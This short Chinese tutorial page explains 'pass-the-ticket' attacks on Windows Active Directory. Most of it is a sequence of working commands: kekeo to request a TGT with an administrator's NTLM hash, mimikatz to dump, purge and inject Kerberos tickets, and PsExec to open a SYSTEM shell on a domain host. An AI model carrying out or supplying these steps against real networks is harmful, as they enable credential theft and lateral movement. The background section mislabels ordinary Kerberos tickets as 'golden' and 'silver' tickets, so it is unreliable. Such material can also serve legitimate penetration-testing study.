🔥码云GVP开源项目 12k star Uniapp+ElementUI 功能强大 支持多语言、二开方便! 广告
[TOC] ## 什么是票据传递? ~~~ • 哈希传递需要具备管理员权限,票据传递不需要具备管理员权限 在域内登陆计算机分为6步 1、客户机向AD发送请求,带有信息 2、AD返回请求,带有一个黄金票据 3、客户机带着黄金票据访问AD 4、AD返回一个白银票据 5、客户机带着服务器访问域机器 6、服务器验证是否通过 ~~~ ## 信息收集 ~~~ • 域名:dongta.test • 用户名:administrator • NTLM Hash: ee5d4b6c81a5b0ef40f2e5a662d1379a ~~~ ## 使用kekeo传递票据 ~~~ 生成黄金票据 执行:tgt::ask /user:administrator /domain:dongta.test /ntlm:哈希值 导入票据 TGT_administrator@DONGTA.TEST_krbtgt~dongta.test@DONGTA.TEST.kirb ~~~ ## PsExec建立shell脚本 ~~~ Psexec.exe \\192.168.11.11 -s cmd.exe ~~~ ## 使用mimikatz传递票据 ~~~ 提高权限 privilege::debug 导出票据 sekurlsa::tickets /export 清空票据 kerberos::purge 导入票据 kerberos::ptt 票据文件名称 ~~~